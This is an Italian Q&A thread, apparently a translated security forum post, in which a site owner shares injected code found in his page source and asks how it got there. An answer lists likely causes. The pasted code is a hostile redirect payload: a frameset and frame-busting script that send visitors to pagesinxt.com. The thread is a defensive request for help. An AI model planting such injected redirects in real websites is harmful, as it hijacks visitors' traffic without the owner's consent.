"pagesinxt.com" link nel codice sorgente, sono stato violato?

1

In questo momento sono stato hackerato e non so fermarlo. Lasciami spiegare ...

Il mio sito web è ospitato in un VPS in cui sono l'unica persona che ha accesso ad esso. La pagina è compilata con Codeigniter (aggiornato) e Doctrine (aggiornato anche). Una volta navigato su index.php, vedo questo codice nella fonte:

<!--
    top.location="http://pagesinxt.com/?dn=eqtisad.u13.biz&fp=uG6gKivovi4x8JjEAROV%2FTKBtIWD%2Blle7UNutYwxGdAyGVrZoBm5Bekjw2z7vZmvYE9r56BxR%2FdwKJnOW1e8aQ%3D%3D&prvtof=3um92iAJbFQD4ie3mqlX9yNOXQElLxUpPsdwROXtIXk%3D&poru=8V8ohaa543uO%2BrtgyMrGBIAkgU2lu1ckclS6TcL72%2BnBM2%2BYG73v%2FyLI9ZhKVjCGL2w0E5BxYal2xKLR2ERsB3mlhGebCpkQgGj4df%2BIkrc%3D&cifr=1&flrdr=yes&nxte=gif";
    /*
-->
<script type="text/javascript">
    <!--
    dimensionUpdated = 0;
    function applyFrameKiller()
    {
        if(window.top != self)
        {
            cHeight = 0;
            if( typeof( window.innerHeight ) != 'undefined' ) {
            //Non-IE
            cHeight = window.innerHeight;
            dimensionUpdated = 1;
            } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
            //IE 6+ in 'standards compliant mode'
            cHeight = document.documentElement.clientHeight;
            dimensionUpdated = 1;
            } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
            //IE 4 compatible
            cHeight = document.body.clientHeight;
            dimensionUpdated = 1;
            }
            if( cHeight <= 250 && dimensionUpdated == 1)
            {
                window.top.location = "http://pagesinxt.com/?dn=eqtisad.u13.biz&fp=uG6gKivovi4x8JjEAROV%2FTKBtIWD%2Blle7UNutYwxGdAyGVrZoBm5Bekjw2z7vZmvYE9r56BxR%2FdwKJnOW1e8aQ%3D%3D&prvtof=H4TY0TTX3NzJR65BWTqd5iL%2FuG%2FrWNlJRpGGD7lLlAI%3D&poru=VPQxzhVHETonB83RBOqqTOJMW1rvUm850o6RD0TzdI6oyXwlzAeOG%2FK17FifSzcxHolUxHDNgpTE%2BnRQSwqPDCIL8FKABEYRdUxAEcBGi8s%3D&cifr=1&flrdr=yes&nxte=gif";
            }
        }
    }

    applyFrameKiller();
    // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
    <frame src="http://pagesinxt.com/?dn=eqtisad.u13.biz&fp=uG6gKivovi4x8JjEAROV%2FTKBtIWD%2Blle7UNutYwxGdAyGVrZoBm5Bekjw2z7vZmvYE9r56BxR%2FdwKJnOW1e8aQ%3D%3D&prvtof=QNdLHvfpmQDcCjmfkLp0UoTOm9%2FlbsSY5zwRjXbMEDs%3D&poru=ZFDh3zFdBl8oLoFKYzmbIrndO0AsgI5yGs9la3B3DvUnOwJwZj4aeWo5bo5PRkvlGhqLFIwXyhV4DxStH7tHRS%2FbB902y5I8kPm7LLxSgJ0%3D&flrdr=yes&nxte=gif"></frameset><noframes><bodybgcolor="#ffffff" text="#000000">
    <a href="http://pagesinxt.com/?dn=eqtisad.u13.biz&fp=uG6gKivovi4x8JjEAROV%2FTKBtIWD%2Blle7UNutYwxGdAyGVrZoBm5Bekjw2z7vZmvYE9r56BxR%2FdwKJnOW1e8aQ%3D%3D&prvtof=DFirIGqMqM7SgRb4jbom9x%2FWLKk2BsDoNNUAtuffLcM%3D&poru=h4Hln0ENUyIUaYgUi37Z6zIj6%2FYWgvyln3NWEddNbSBI1tQexg46ZMAGiZ0lsT6C4pkl6AcLCw9x0J6hZhJcNgm04ONcuO4STG69vF4Nue8%3D&flrdr=yes&nxte=gif">Click here to proceed</a>.
    </body>
</noframes><!--
*/
-->

Qualcosa che non capisco

  • Se apri index.php il codice è corretto (codice originale), quindi .. come è possibile vedere il codice sopra nel browser, ma con ftp il file è ok?

  • Non sono mai stato attaccato prima, quindi, quali dovrebbero essere le prime linee guida da esaminare? quale dovrebbe essere una corretta risoluzione dei problemi per trovare / minimizzare la sicurezza del buco?

  • (Qui mi sto confondendo di più). Questo hack è intermittente, perché quando premo F5 l'hack scompare per 2 o 3 minuti, ma ritorna di nuovo! Sono molto spaventato :(

posta manix 10.03.2013 - 00:46
fonte

1 risposta

4

Se lo script appare nell'origine della pagina, ma quando guardi l'origine della pagina sul server che non stai vedendo, potrebbe accadere una delle varie cose.

1) Potrebbe essere il tuo computer che è stato infettato da malware e non dal server, e l'iniezione proviene da qualcosa in esecuzione sul tuo computer.

2) L'iniezione proviene da un file esterno a cui fa riferimento la pagina, ad esempio un server side include, o un file JavaScript esterno che sta scrivendo il codice dannoso.

3) L'iniezione potrebbe provenire da qualche altra parte del processo di risposta, come un filtro di risposta che modifica tutti i flussi di risposta prima di restituirli al client.

Una ricerca rapida mi dice che altri hanno visto malware simile consegnato tramite un riferimento JavaScript esterno, quindi questo è il primo posto che guarderei. Verifica se la pagina fa riferimento a file JavaScript contenenti codice non riconosciuto o compreso. Probabilmente verrà offuscato e quindi non assomiglierà a ciò che vedi nel sorgente della pagina.

    
risposta data 10.03.2013 - 00:59
fonte

Leggi altre domande sui tag